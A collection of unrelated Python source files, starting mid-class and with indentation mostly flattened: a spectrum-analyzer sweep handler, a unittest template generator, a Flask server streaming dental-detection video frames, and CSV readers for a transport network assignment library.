self.sp_corr_obj.buffer_to_vector(_get_correction(self.real_device, "SIGNAL"))
except ValueError:
self.sp_corr_obj = None
self.nf_corr_obj = correction_vector()
try:
self.nf_corr_obj.buffer_to_vector(_get_correction(self.real_device, "NOISE"))
except ValueError:
self.nf_corr_obj = None
self.async_callback = async_callback
self.continuous = False
# init the sweep id
self._next_sweep_id = 0
# init last finished (technically, it hasn't finished, but for our purposes, it has)
self._last_finished = True
# Private function
def log(self, firstmsg, *msgs):
if self.logtype == 'LOG':
self.logstr += firstmsg.__str__()
for msg in msgs:
self.logstr += ", "
self.logstr += msg.__str__()
self.logstr += "\n"
elif self.logtype == 'PRINT':
sys.stdout.write(firstmsg.__str__())
for msg in msgs:
sys.stdout.write(", ")
sys.stdout.write(msg.__str__())
sys.stdout.write("\n")
def enable_flattening(self, enable=None):
"""
:param enable: enable or disable spectral flattening
:type enable: bool or None
"""
if enable is None:
return self._flattening_enabled
else:
self._flattening_enabled = enable
def set_geolocation_callback(self, func, data = None):
"""
set a callback that will get called whenever the geolocation information
of the device is updated.
The callback function should accept two parameters. The first parameter
will be the callback data that was passed in this function
set_geolocation_callback(func, data, geolocation_dictionary).
The geolocation_dictionary will have the following properties:
- oui
- seconds
- altitude
- longitude
- speedoverground
- secondsfractional
- track
- latitude
- magneticvariation
- heading
See the programmer's guide for usage on each of these properties.
:param func: the function to be called
:param data: the data to be passed to the function
:returns: None
"""
self._geo_callback_func = func
self._geo_callback_data = data
def capture_power_spectrum(self,
fstart,
fstop,
rbw,
device_settings=None,
mode='SH',
continuous=False):
"""
Initiate a data capture from the *real_device* by setting up a sweep list
and starting a single sweep, and then return power spectral density data
along with the **actual** sweep start and stop frequencies set (which
might not be exactly the same as the requested *fstart* and *fstop*).
.. note:: This function does not pipeline, and if the last sweep isn't received before starting a new one, it will generate a failure.
:param int fstart: sweep starting frequency in Hz
:param int fstop: sweep ending frequency in Hz
:param float rbw: the resolution bandwidth (RBW) in Hz of the data to be captured (output RBW may be smaller than requested)
:param device_settings: attenuation and other device settings
:type device_settings: dict
:param str mode: sweep mode, 'ZIF', 'SH', or 'SHN'
:param bool continuous: set sweep to be continuously or not (once only)
:returns: fstart, fstop, power_data
"""
self.log("- capture_power_spectrum", fstart, fstop, rbw, device_settings, mode, continuous)
if continuous and not self.async_callback:
raise SweepDeviceError(
"continuous mode only applies to async operation")
# see if the last sweep has finished
if not self._last_finished:
raise SweepDeviceError(
"previous sweep must have finished before starting a new one")
self._last_finished = False
# increment the sweep id
if self._next_sweep_id < 0x00000000ffffffff:
self._next_sweep_id += 1
else:
self._next_sweep_id = 0
# keep track if this is a continuous sweep
self.continuous = continuous
# plan the sweep
self._sweep_planner = SweepPlanner(self.dev_properties)
self._sweep_settings = self._sweep_planner.plan_sweep(fstart, fstop, rbw, mode, device_settings)
self.log("self._sweep_settings = %s" % self._sweep_settings)
# remember our last sweep for optimization purposes
self._last_sweep = (fstart, fstop, rbw, mode, device_settings, continuous)
# configure the device with the sweep_settings
self.real_device.sweep_clear()
self.real_device.sweep_add(self._sweep_settings)
# configure the iteration
self.real_device.sweep_iterations(1)
# capture the sweep data
return self._perform_full_sweep()
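    # Minimal blocking-mode sketch (device construction is an assumption; a
    # real WSA from pyrf.devices.thinkrf would be passed in):
    #
    #   sd = SweepDevice(wsa)
    #   fstart, fstop, psd = sd.capture_power_spectrum(2.4e9, 2.5e9, 100e3)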
def _perform_full_sweep(self):
# perform the sweep using async socket
if self.async_callback:
# set the async callback
self.real_device.set_async_callback(self._vrt_receive)
# start the sweep sequence
self._start_sweep()
return
# perform sweep using blocking sockets
self._start_sweep()
result = None
while result is None:
result = self._vrt_receive(self.real_device.read())
return result
def _start_sweep(self):
self._vrt_context = {}
# initialize the array we'll use to hold results
self.spectral_data = np.zeros(self._sweep_settings.spectral_points)
        # keep track of packets received
self.packet_count = 0
self.real_device.sweep_start(self._next_sweep_id)
def _vrt_receive(self, packet):
# context packet just update our context dictionary
if packet.is_context_packet():
# look for any geolocation info
geo = { }
for field in [ 'latitude', 'longitude', 'altitude', 'speedoverground', 'heading', 'track', 'magneticvariation' ]:
if field in packet.fields:
geo[field] = packet.fields[field]
if geo and self._geo_callback_func:
# execute callback
func = self._geo_callback_func
func(self._geo_callback_data, geo)
self._vrt_context.update(packet.fields)
self.log(packet)
return
        # check to see if we received our sweep ID
if not ('sweepid' in self._vrt_context):
return
# make sure we are receiving packets for the right sweep
if not (self._vrt_context['sweepid'] == self._next_sweep_id):
raise SweepDeviceError("data packets received before start of sweep received! cur = %d, next = %d" % (self._vrt_context['sweepid'], self._next_sweep_id))
# increment the packet count
self.packet_count += 1
self.log("#%d of %d - %s" % (self.packet_count, self._sweep_settings.step_count, packet))
# retrieve the frequency and usable BW of the packet
packet_freq = self._vrt_context['rffreq']
usable_bw = self.dev_properties.USABLE_BW[self._sweep_settings.rfe_mode]
# compute the fft
pow_data = compute_fft(self.real_device, packet, self._vrt_context)
# calc rbw for this packet
rbw = float(self.dev_properties.FULL_BW[self._sweep_settings.rfe_mode]) / len(pow_data)
self.log("rbw = %f, %f" % (rbw, self._sweep_settings.rbw))
if self._flattening_enabled:
# Check if we are above 50 MHz and in SH mode
if packet_freq >= 50e6 and self._sweep_settings.rfe_mode == "SH":
number_of_points = len(pow_data)
# check if we have correction vectors (Noise)
if self.nf_corr_obj is not None:
# if so grab them
nf_cal = \
self.nf_corr_obj.get_correction_vector(packet_freq,
number_of_points)
else:
                    # if not, set it to 0
nf_cal = np.zeros(number_of_points)
                # check if we have correction vectors (Spectrum)
if self.sp_corr_obj is not None:
# if so grab them
sp_cal = \
self.sp_corr_obj.get_correction_vector(packet_freq,
number_of_points)
else:
                    # if not, set it to 0
sp_cal = np.zeros(number_of_points)
# if the data is spectraly inverted, invert the vectors
if packet.spec_inv:
nf_cal = np.flipud(nf_cal)
sp_cal = np.flipud(sp_cal)
# calculate the correction threshold
correction_thresh = (-135.0 + ((10.0 * packet_freq / 1e6)
/ 27000.0) + 10.0
* np.log10(rbw)
+ self._sweep_settings.attenuation)
                # create the spectrum: per bin, if the amplitude is above the
                # correction threshold use pow_data - sp_cal, otherwise
                # pow_data - nf_cal
pow_data = np.where(pow_data < correction_thresh,
pow_data - nf_cal, pow_data - sp_cal)
# check if DD mode was used in this sweep
if self.packet_count == 1 and self._sweep_settings.dd_mode:
# copy the data into the result array
            self._copy_data(0, self.dev_properties.FULL_BW['DD'], pow_data, self._sweep_settings.bandstart, self._sweep_settings.bandstop, self.spectral_data)
if self._sweep_settings.beyond_dd:
return
else:
return self._emit_data()
# determine the usable bins in this config
self.log("===> compute_usable_bins()", self._sweep_settings.rfe_mode, self._sweep_settings.spp, 1, 0)
usable_bins = compute_usable_bins(self.dev_properties,
self._sweep_settings.rfe_mode,
self._sweep_settings.spp,
1,
0)
self.log("<--- usable_bins", usable_bins)
# adjust the usable range based on spectral inversion
self.log("===> adjust_usable_fstart_fstop()", "self.dev_properties", self._sweep_settings.rfe_mode, len(pow_data) * 2, 1, packet_freq, packet.spec_inv, usable_bins)
usable_bins, packet_start, packet_stop = adjust_usable_fstart_fstop(self.dev_properties,
self._sweep_settings.rfe_mode,
len(pow_data) * 2,
1,
packet_freq,
packet.spec_inv,
usable_bins)
self.log("<--- adjust_usable_fstart_fstop", packet_start, packet_stop, usable_bins)
#
# WARNING: the start and stop returned from this function are HIGHLY sketchy
#
# calculate packet frequency range
#packet_start = packet_freq - (self.dev_properties.FULL_BW[self._sweep_settings.rfe_mode] / 2)
#packet_stop = packet_freq + (self.dev_properties.FULL_BW[self._sweep_settings.rfe_mode] / 2)
#print "packet start/stop", packet_start, packet_stop
#trim the FFT data, note decimation is 1, fshift is 0
self.log("===> trim_to_usable_fstart_fstop()", "pow_data", usable_bins, packet_start, packet_stop)
trimmed_spectrum, edge_data, usable_start, usable_stop = trim_to_usable_fstart_fstop(pow_data,
usable_bins,
packet_start,
packet_stop)
self.log("<--- trim_to_usable_fstart_fstop", usable_start, usable_stop, "trimmed_spectrum", edge_data)
# copy the data
        self._copy_data(usable_start, usable_stop, trimmed_spectrum, self._sweep_settings.bandstart, self._sweep_settings.bandstop, self.spectral_data)
# if there's no more packets, emit result
if self.packet_count == self._sweep_settings.step_count:
return self._emit_data()
# all done
return
def _emit_data(self):
# note that we finished this sweep
self._last_finished = True
# if async callback is available, emit the data
if self.async_callback:
self.async_callback(self._sweep_settings.bandstart, self._sweep_settings.bandstop, self.spectral_data)
return
# return the values if using blocking sockets
else:
return (self._sweep_settings.bandstart, self._sweep_settings.bandstop, self.spectral_data)
def _copy_data(self, src_fstart, src_fstop, src_psd, dst_fstart, dst_fstop, dst_psd):
self.log("_copy_data(%d, %d, src_psd, %d, %d, dst_psd)" % (src_fstart, src_fstop, dst_fstart, dst_fstop))
# calc src len and dst len
srclen = len(src_psd)
dstlen = len(dst_psd)
self.log("len -- src = %d, dst = %d" % (srclen, dstlen))
# calc src and dest rbw
srcrbw = float(src_fstop - src_fstart) / srclen
dstrbw = float(dst_fstop - dst_fstart) / dstlen
self.log("rbw = %f, %f, %f" % (srcrbw, dstrbw, self._sweep_settings.rbw))
# check if packet start is before sweep start. shouldn't happen, but check anyway
self.log("boundary(start) = %f / %f" % (src_fstart, dst_fstart))
        if src_fstart < dst_fstart:
            self.log("packet starts before sweep band")
            src_start_bin = int(float(dst_fstart - src_fstart) / srcrbw)
        else:
            self.log("packet starts inside sweep band")
            src_start_bin = 0
# check if packet stop is after sweep stop. this means we don't need the whole packet
self.log("boundary(stop) = %f / %f" % (src_fstop, dst_fstop))
        if src_fstop > dst_fstop:
            self.log("packet stops after sweep band")
            src_stop_bin = srclen - int(float(src_fstop - dst_fstop) / srcrbw)
        else:
            self.log("packet stops inside sweep band")
            src_stop_bin = srclen
# how many values are we copying?
tocopy = src_stop_bin - src_start_bin
# calculate dest start index
if src_fstart < dst_fstart:
dst_start_bin = 0
else:
dst_start_bin = int(round(float(src_fstart - dst_fstart) / dstrbw))
# calculate dest stop index
dst_stop_bin = dst_start_bin + tocopy
if dst_stop_bin > dstlen:
dst_stop_bin = dstlen
# adjust tocopy
tocopy = dst_stop_bin - dst_start_bin
# adjust src stop bin because we adjusted tocopy
src_stop_bin = src_start_bin + tocopy
# copy the data, if there's data that needs copying
if ((dst_stop_bin - dst_start_bin) > 0) and ((src_stop_bin - src_start_bin) > 0):
self.log("dst_psd[%d:%d] = src_psd[%d:%d]" % (dst_start_bin, dst_stop_bin, src_start_bin, src_stop_bin))
dst_psd[dst_start_bin:dst_stop_bin] = src_psd[src_start_bin:src_stop_bin]
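# Worked example of the bin mapping above (illustrative numbers only, not
# from the original source): a packet spanning 100-200 MHz in 100 bins
# (srcrbw = 1 MHz/bin) copied into a sweep band spanning 150-250 MHz in
# 100 bins gives src_start_bin = (150-100)/1 = 50, src_stop_bin = 100,
# tocopy = 50, dst_start_bin = 0 and dst_stop_bin = 50, i.e.
# dst_psd[0:50] = src_psd[50:100].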
|
65954
|
TEMPLATE = """import numpy as np
import unittest
from {name}.algorithm.research_algorithm import {name_upper}Estimator
class Test{name_upper}Estimator(unittest.TestCase):
def test_predict(self):
multiplier = 2
input_data = np.random.random([1, 2])
expected_result = input_data * multiplier
estimator = {name_upper}Estimator(multiplier=multiplier)
result = estimator.predict(input_data)
self.assertTrue(np.allclose(result, expected_result))
"""
def get_template(name: str):
return TEMPLATE.format(name=name.lower(),
name_upper=name.capitalize())
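# Example (illustrative): get_template("demo") renders a test module that
# imports DemoEstimator from demo.algorithm.research_algorithm and defines a
# TestDemoEstimator test case, since name.lower() -> 'demo' and
# name.capitalize() -> 'Demo'.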
|
65969
|
import socket
from flask import Flask, Response
from PIL import Image, ImageDraw
import threading
from collections import deque
import struct
import io
import time
HOST = '0.0.0.0'
PORT = 54321
image_bytes_length = 640*480*3
bbox_bytes_length = 5*8
# The socket client sends one bounding box and score.
data_bytes_length = image_bytes_length + bbox_bytes_length
app = Flask(__name__)
# The buffer that holds the most recent JPEG frame.
stream_buffer = deque(maxlen=1)
# global flag
should_capture = False
# The buffer that holds the most recent captured JPEG frame, which is either the first frame after the should_capture flag is set, or the latest frame showing a missing tooth.
capture_buffer = deque(maxlen=1)
# This functions returns an additional flag indicating whether a missing tooth bounding box has been drawn.
def to_jpeg(image_bytes, bbox_bytes):
# Unpack the bytes to a list of floats.
f = []
for i in range(5):
# Each float was encoded into 8 bytes.
float_bytes = bbox_bytes[8*i:8*(i+1)]
float_value, = struct.unpack('!d', float_bytes)
f.append(float_value)
# This buffer holds the JPEG image which will be a single frame of the streaming video.
bytes_buffer = io.BytesIO()
image = Image.frombytes('RGB', (640, 480), image_bytes, 'raw', 'RGB')
# Draw a box showing the part of the image that was sent to the model, with corner coordinates (0, 0) and (224, 224).
x1, y1, x2, y2 = (0.0, 0.0, 224.0, 224.0)
# These offsets invert the cropping in recognize.py:image_bytes_to_image.
x1 += 258
x2 += 258
y1 += 148
y2 += 148
draw = ImageDraw.Draw(image)
draw.line(xy=[(x1, y1), (x2, y1), (x2, y2), (x1, y2), (x1, y1)], fill=128, width=5)
del draw
# Draw an additional bounding box if a missing tooth was detected.
x1, y1, x2, y2, score = f
bbox_drawn = False
if score > 0.5:
bbox_drawn = True
# The coordinates from the DetectionEngine were normalized. Transform to the pixel scale before drawing.
x1 *= 224
x2 *= 224
y1 *= 224
y2 *= 224
        # Place the cropped (224, 224) image back in the (640, 480) image at the correct position.
x1 += 258
x2 += 258
y1 += 148
y2 += 148
draw = ImageDraw.Draw(image)
draw.line(xy=[(x1, y1), (x2, y1), (x2, y2), (x1, y2), (x1, y1)], fill=128, width=5)
# Write image to the buffer and return the JPEG bytes.
image.save(bytes_buffer, format='JPEG')
frame = bytes_buffer.getvalue()
return frame, bbox_drawn
def server_worker(host, port, stream_buffer, capture_buffer):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((host, port))
s.listen()
print('Waiting for connection.')
conn, addr = s.accept()
with conn:
print('Client: {}'.format(addr))
while True:
try:
                    # image bytes followed by bounding-box/score bytes.
                    # recv() may return fewer bytes than requested, so read
                    # until one full record has arrived to keep the stream aligned.
                    data = b''
                    while len(data) < data_bytes_length:
                        chunk = conn.recv(data_bytes_length - len(data))
                        if not chunk:
                            raise ConnectionError('client closed the connection')
                        data += chunk
                    if len(data) == data_bytes_length:
image_bytes = data[:image_bytes_length]
bbox_bytes = data[image_bytes_length:]
frame, bbox_drawn = to_jpeg(image_bytes, bbox_bytes)
stream_buffer.append(frame)
# update the frame in capture_buffer if:
# (a) should_capture is True and capture_buffer is empty; or
# (b) should_capture is True and bbox_drawn is True
should_update = should_capture and (bbox_drawn or not capture_buffer)
if should_update:
capture_buffer.append(frame)
except Exception as e:
print(repr(e))
break
def make_generator(buffer_):
while True:
if buffer_:
# peek instead of pop, since the buffer may not always be updated
frame = buffer_[-1]
        else:
            # no frame yet; sleep briefly instead of spinning at full speed
            time.sleep(0.01)
            continue
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
@app.route('/video')
def video():
generator = make_generator(stream_buffer)
return Response(generator,
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/capture')
def capture():
generator = make_generator(capture_buffer)
return Response(generator,
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/start_capture')
def start_capture():
# We're clearing the capture buffer here because the logic while capturing
# is to only grab a buffer frame if the buffer is empty or missing teeth
# is detected, and we want to be sure to grab a fresh still each time even
# when no teeth are detected
global capture_buffer
capture_buffer.clear()
global should_capture
should_capture = True
return 'OK', 200
@app.route('/stop_capture')
def stop_capture():
global should_capture
should_capture = False
return 'OK', 200
@app.route('/')
def index():
return 'OK', 200
if __name__ == '__main__':
thread = threading.Thread(target=server_worker, args=(HOST, PORT, stream_buffer, capture_buffer))
thread.start()
app.run(host='0.0.0.0', debug=False)
thread.join()
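# --- Illustrative client sketch (not part of the original service) ---
# Each record sent to port 54321 is 640*480*3 raw RGB bytes followed by five
# big-endian doubles (x1, y1, x2, y2, score), matching data_bytes_length
# above. A minimal client could pack one record like this (dummy values):
#   import socket, struct
#   import numpy as np
#   frame = np.zeros((480, 640, 3), dtype=np.uint8)      # dummy image
#   bbox = struct.pack('!5d', 0.1, 0.1, 0.9, 0.9, 0.95)  # x1,y1,x2,y2,score
#   with socket.create_connection(('127.0.0.1', 54321)) as s:
#       s.sendall(frame.tobytes() + bbox)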
|
66009
|
import os
import csv
import threading
from .classes import Node, Link, Network, Column, ColumnVec, VDFPeriod, \
AgentType, DemandPeriod, Demand, Assignment, UI
from .colgen import update_links_using_columns
from .consts import SMALL_DIVISOR
__all__ = [
'read_network',
'load_columns',
'output_columns',
'output_link_performance',
'download_sample_data_sets',
'output_agent_paths'
]
# for precheck on connectivity of each OD pair
# 0: isolated, has neither outgoing links nor incoming links
# 1: has at least one outgoing link
# 2: has at least one incoming link
# 3: has both outgoing and incoming links
_zone_degrees = {}
def _update_orig_zone(oz_id):
if oz_id not in _zone_degrees:
_zone_degrees[oz_id] = 1
elif _zone_degrees[oz_id] == 2:
_zone_degrees[oz_id] = 3
def _update_dest_zone(dz_id):
if dz_id not in _zone_degrees:
_zone_degrees[dz_id] = 2
elif _zone_degrees[dz_id] == 1:
_zone_degrees[dz_id] = 3
def _are_od_connected(oz_id, dz_id):
connected = True
# at least one node in O must have outgoing links
if oz_id not in _zone_degrees or _zone_degrees[oz_id] == 2:
connected = False
print(f'WARNING! {oz_id} has no outgoing links to route volume '
f'between OD: {oz_id} --> {dz_id}')
# at least one node in D must have incoming links
if dz_id not in _zone_degrees or _zone_degrees[dz_id] == 1:
if connected:
connected = False
print(f'WARNING! {dz_id} has no incoming links to route volume '
f'between OD: {oz_id} --> {dz_id}')
return connected
def _convert_str_to_int(s):
    """Convert a string to an integer.
    The emptiness check takes care of the case that s is None or empty;
    ValueError covers strings like '12.0'; TypeError covers non-string,
    non-numeric inputs.
    """
    if not s:
        return None
    try:
        return int(s)
    except ValueError:
        return int(float(s))
    except TypeError:
        return None
def _convert_str_to_float(s):
    """Convert a string to a float.
    The emptiness check takes care of the case that s is None or empty;
    TypeError and ValueError cover any remaining invalid inputs.
    """
    if not s:
        return None
    try:
        return float(s)
    except (TypeError, ValueError):
        return None
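# Illustrative behaviour of the two converters above (not in the original file):
#   _convert_str_to_int('12')    -> 12
#   _convert_str_to_int('12.0')  -> 12
#   _convert_str_to_int('')      -> None
#   _convert_str_to_float('1.5') -> 1.5
#   _convert_str_to_float(None)  -> None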
def _download_url(url, filename, loc_dir):
    try:
        import requests
    except ImportError:
        print('please install requests to proceed with downloading!!')
        return
    try:
        r = requests.get(url)
        r.raise_for_status()
        with open(loc_dir+filename, 'wb') as f:
            f.write(r.content)
    except requests.HTTPError:
        print('file does not exist: '+url)
    except requests.ConnectionError:
        raise Exception('check your connection!!!')
    except Exception as e:
        raise e
def download_sample_data_sets():
url = 'https://raw.githubusercontent.com/jdlph/Path4GMNS/master/data/'
data_sets = [
"ASU",
"Braess_Paradox",
"Chicago_Sketch",
"Lima_Network",
"Sioux_Falls",
"Two_Corridor"
]
files = [
"node.csv",
"link.csv",
"demand.csv",
"settings.csv",
"settings.yml"
]
print('downloading starts')
    # data folder under cwd
loc_data_dir = 'data'
if not os.path.isdir(loc_data_dir):
os.mkdir(loc_data_dir)
for ds in data_sets:
web_dir = url + ds + '/'
loc_sub_dir = os.path.join(loc_data_dir, ds) + '/'
if not os.path.isdir(loc_sub_dir):
os.mkdir(loc_sub_dir)
# multi-threading
threads = []
for x in files:
t = threading.Thread(
target=_download_url,
args=(web_dir+x, x, loc_sub_dir)
)
t.start()
threads.append(t)
for t in threads:
t.join()
    print('downloading completed')
print('check '+os.path.join(os.getcwd(), loc_data_dir)+' for downloaded data sets')
def read_nodes(input_dir,
nodes,
id_to_no_dict,
no_to_id_dict,
zone_to_node_dict):
""" step 1: read input_node """
with open(input_dir+'/node.csv', 'r') as fp:
print('read node.csv')
reader = csv.DictReader(fp)
node_seq_no = 0
for line in reader:
# set up node_id, which should be an integer
node_id = _convert_str_to_int(line['node_id'])
if node_id is None:
continue
# set up zone_id, which should be an integer
zone_id = _convert_str_to_int(line['zone_id'])
if zone_id is None:
zone_id = -1
# treat them as string
coord_x = line['x_coord']
coord_y = line['y_coord']
# construct node object
node = Node(node_seq_no, node_id, zone_id, coord_x, coord_y)
nodes.append(node)
# set up mapping between node_seq_no and node_id
id_to_no_dict[node_id] = node_seq_no
no_to_id_dict[node_seq_no] = node_id
# associate node_id with corresponding zone
if zone_id not in zone_to_node_dict.keys():
zone_to_node_dict[zone_id] = []
zone_to_node_dict[zone_id].append(node_id)
node_seq_no += 1
print(f'the number of nodes is {node_seq_no}')
zone_size = len(zone_to_node_dict)
# do not count virtual zone with id as -1
if -1 in zone_to_node_dict.keys():
zone_size -= 1
print(f'the number of zones is {zone_size}')
def read_links(input_dir,
links,
nodes,
id_to_no_dict,
link_id_dict,
agent_type_size,
demand_period_size,
load_demand):
""" step 2: read input_link """
with open(input_dir+'/link.csv', 'r') as fp:
print('read link.csv')
reader = csv.DictReader(fp)
link_seq_no = 0
for line in reader:
# it can be an empty string
link_id = line['link_id']
# check the validity
from_node_id = _convert_str_to_int(line['from_node_id'])
if from_node_id is None:
continue
to_node_id =_convert_str_to_int(line['to_node_id'])
if to_node_id is None:
continue
length = _convert_str_to_float(line['length'])
if length is None:
continue
# pass validity check
try:
from_node_no = id_to_no_dict[from_node_id]
to_node_no = id_to_no_dict[to_node_id]
except KeyError:
print(f'EXCEPTION: Node ID {from_node_id} '
f'or/and Node ID {to_node_id} NOT IN THE NETWORK!!')
continue
# for the following attributes,
# if they are not None, convert them to the corresponding types
# if they are None's, set them using the default values
lanes = _convert_str_to_int(line['lanes'])
if lanes is None:
lanes = 1
link_type = _convert_str_to_int(line['link_type'])
if link_type is None:
link_type = 1
free_speed = _convert_str_to_int(line['free_speed'])
if free_speed is None:
free_speed = 60
# issue: int??
capacity = _convert_str_to_int(line['capacity'])
if capacity is None:
capacity = 49500
            # if link.csv does not have a column 'allowed_uses',
            # set allowed_uses to 'all'
# developer's note:
# we may need to change this implementation as we cannot deal with
# cases a link which is not open to any modes
try:
allowed_uses = line['allowed_uses']
if not allowed_uses:
allowed_uses = 'all'
except KeyError:
allowed_uses = 'all'
            # if link.csv does not have a column 'geometry',
            # set geometry to ''
try:
geometry = line['geometry']
except KeyError:
geometry = ''
link_id_dict[link_id] = link_seq_no
# construct link object
link = Link(link_id,
link_seq_no,
from_node_no,
to_node_no,
from_node_id,
to_node_id,
length,
lanes,
link_type,
free_speed,
capacity,
allowed_uses,
geometry,
agent_type_size,
demand_period_size)
# VDF Attributes
for i in range(demand_period_size):
dp_id_str = str(i+1)
header_vdf_alpha = 'VDF_alpha' + dp_id_str
header_vdf_beta = 'VDF_beta' + dp_id_str
header_vdf_mu = 'VDF_mu' + dp_id_str
header_vdf_fftt = 'VDF_fftt' + dp_id_str
header_vdf_cap = 'VDF_cap' + dp_id_str
header_vdf_phf = 'VDF_phf' + dp_id_str
                # case i: link.csv does not have VDF attributes at all
# case ii: link.csv only has partial VDF attributes
# under case i, we will set up only one VDFPeriod object using
# default values
# under case ii, we will set up some VDFPeriod objects up to
# the number of complete set of VDF_alpha, VDF_beta, and VDF_mu
try:
VDF_alpha = line[header_vdf_alpha]
if VDF_alpha:
VDF_alpha = float(VDF_alpha)
except (KeyError, TypeError):
if i == 0:
# default value will be applied in the constructor
VDF_alpha = 0.15
else:
break
try:
VDF_beta = line[header_vdf_beta]
if VDF_beta:
VDF_beta = float(VDF_beta)
except (KeyError, TypeError):
if i == 0:
# default value will be applied in the constructor
VDF_beta = 4
else:
break
try:
VDF_mu = line[header_vdf_mu]
if VDF_mu:
VDF_mu = float(VDF_mu)
except (KeyError, TypeError):
if i == 0:
# default value will be applied in the constructor
VDF_mu = 1000
else:
break
try:
VDF_fftt = line[header_vdf_fftt]
if VDF_fftt:
VDF_fftt = float(VDF_fftt)
except (KeyError, TypeError):
# set it up using length and free_speed from link
VDF_fftt = length / max(SMALL_DIVISOR, free_speed) * 60
try:
VDF_cap = line[header_vdf_cap]
if VDF_cap:
VDF_cap = float(VDF_cap)
except (KeyError, TypeError):
# set it up using capacity from link
VDF_cap = capacity
# not a mandatory column
try:
VDF_phf = line[header_vdf_phf]
if VDF_phf:
VDF_phf = float(VDF_phf)
except (KeyError, TypeError):
# default value will be applied in the constructor
VDF_phf = -1
# construct VDFPeriod object
vdf = VDFPeriod(i, VDF_alpha, VDF_beta, VDF_mu,
VDF_fftt, VDF_cap, VDF_phf)
link.vdfperiods.append(vdf)
# set up outgoing links and incoming links
from_node = nodes[from_node_no]
to_node = nodes[to_node_no]
from_node.add_outgoing_link(link)
to_node.add_incoming_link(link)
links.append(link)
# set up zone degrees
if load_demand:
oz_id = from_node.get_zone_id()
dz_id = to_node.get_zone_id()
_update_orig_zone(oz_id)
_update_dest_zone(dz_id)
link_seq_no += 1
print(f'the number of links is {link_seq_no}')
def read_demand(input_dir,
file,
agent_type_id,
demand_period_id,
zone_to_node_dict,
column_pool):
""" step 3:read input_agent """
with open(input_dir+'/'+file, 'r') as fp:
print('read '+file)
at = agent_type_id
dp = demand_period_id
reader = csv.DictReader(fp)
total_agents = 0
for line in reader:
# invalid origin zone id, discard it
oz_id = _convert_str_to_int(line['o_zone_id'])
if oz_id is None:
continue
# invalid destination zone id, discard it
dz_id = _convert_str_to_int(line['d_zone_id'])
if dz_id is None:
continue
# o_zone_id does not exist in node.csv, discard it
if oz_id not in zone_to_node_dict.keys():
continue
# d_zone_id does not exist in node.csv, discard it
if dz_id not in zone_to_node_dict.keys():
continue
volume = _convert_str_to_float(line['volume'])
if volume is None:
continue
if volume == 0:
continue
# precheck on connectivity of each OD pair
if not _are_od_connected(oz_id, dz_id):
continue
# set up volume for ColumnVec
if (at, dp, oz_id, dz_id) not in column_pool.keys():
column_pool[(at, dp, oz_id, dz_id)] = ColumnVec()
column_pool[(at, dp, oz_id, dz_id)].od_vol += volume
total_agents += int(volume + 1)
print(f'the number of agents is {total_agents}')
if total_agents == 0:
raise Exception('NO VALID OD VOLUME!! DOUBLE CHECK YOUR demand.csv')
def _auto_setup(assignment):
""" automatically set up one demand period and one agent type
The two objects will be set up using the default constructors using the
default values. See class DemandPeriod and class AgentType for details
"""
at = AgentType()
dp = DemandPeriod()
d = Demand()
assignment.update_agent_types(at)
assignment.update_demand_periods(dp)
assignment.update_demands(d)
def read_settings(input_dir, assignment):
try:
import yaml as ym
with open(input_dir+'/settings.yml') as file:
settings = ym.full_load(file)
# agent types
agents = settings['agents']
for i, a in enumerate(agents):
agent_type = a['type']
agent_name = a['name']
agent_vot = a['vot']
agent_flow_type = a['flow_type']
agent_pce = a['pce']
agent_ffs = a['free_speed']
at = AgentType(i,
agent_type,
agent_name,
agent_vot,
agent_flow_type,
agent_pce,
agent_ffs)
assignment.update_agent_types(at)
# demand periods
demand_periods = settings['demand_periods']
for i, d in enumerate(demand_periods):
period = d['period']
time_period = d['time_period']
dp = DemandPeriod(i, period, time_period)
assignment.update_demand_periods(dp)
# demand files
demands = settings['demand_files']
for i, d in enumerate(demands):
demand_file = d['file_name']
# demand_format_type = d['format_type']
demand_period = d['period']
demand_type = d['agent_type']
demand = Demand(i, demand_period, demand_type, demand_file)
assignment.update_demands(demand)
except ImportError:
# just in case user does not have pyyaml installed
print('Please install pyyaml next time!')
print('Engine will set up one demand period and one agent type using '
'default values for you, which might NOT reflect your case!\n')
_auto_setup(assignment)
except FileNotFoundError:
# just in case user does not provide settings.yml
print('Please provide settings.yml next time!')
print('Engine will set up one demand period and one agent type using '
'default values for you, which might NOT reflect your case!\n')
_auto_setup(assignment)
except Exception as e:
raise e
def read_network(load_demand=True, input_dir='.'):
assignm = Assignment()
network = Network()
read_settings(input_dir, assignm)
read_nodes(input_dir,
network.node_list,
network.node_id_to_no_dict,
network.node_no_to_id_dict,
network.zone_to_nodes_dict)
read_links(input_dir,
network.link_list,
network.node_list,
network.node_id_to_no_dict,
network.link_id_dict,
assignm.get_agent_type_count(),
assignm.get_demand_period_count(),
load_demand)
if load_demand:
for d in assignm.get_demands():
at = assignm.get_agent_type_id(d.get_agent_type_str())
dp = assignm.get_demand_period_id(d.get_period())
read_demand(input_dir,
d.get_file_name(),
at,
dp,
network.zone_to_nodes_dict,
assignm.column_pool)
network.update(assignm.get_agent_type_count(),
assignm.get_demand_period_count())
assignm.network = network
assignm.setup_spnetwork()
ui = UI(assignm)
return ui
def load_columns(ui, input_dir='.'):
""" developer note: do we use agent.csv to set up network? """
with open(input_dir+'/agent.csv', 'r') as f:
print('read agent.csv')
A = ui._base_assignment
reader = csv.DictReader(f)
        # just in case agent_id was not output
last_agent_id = 0
for line in reader:
# critical info
oz_id = _convert_str_to_int(line['o_zone_id'])
if oz_id is None:
continue
dz_id = _convert_str_to_int(line['d_zone_id'])
if dz_id is None:
continue
node_seq = line['node_sequence']
if node_seq is None:
continue
link_seq = line['link_sequence']
if link_seq is None:
continue
# non-critical info
agent_id = _convert_str_to_int(line['agent_id'])
if agent_id is None:
agent_id = last_agent_id + 1
last_agent_id = agent_id
# it could be empty
# path_id = line['path_id']
at = line['agent_type']
if not at:
continue
else:
at = A.get_agent_type_id(at)
dp = line['demand_period']
if not dp:
continue
else:
dp = A.get_demand_period_id(dp)
vol = _convert_str_to_float(line['volume'])
if vol is None:
continue
toll = _convert_str_to_float(line['toll'])
if toll is None:
toll = 0
tt = _convert_str_to_float(line['travel_time'])
if tt is None:
tt = 0
dist = _convert_str_to_float(line['distance'])
if dist is None:
dist = 0
# it could be empty
geo = line['geometry']
if (at, dp, oz_id, dz_id) not in A.get_column_pool().keys():
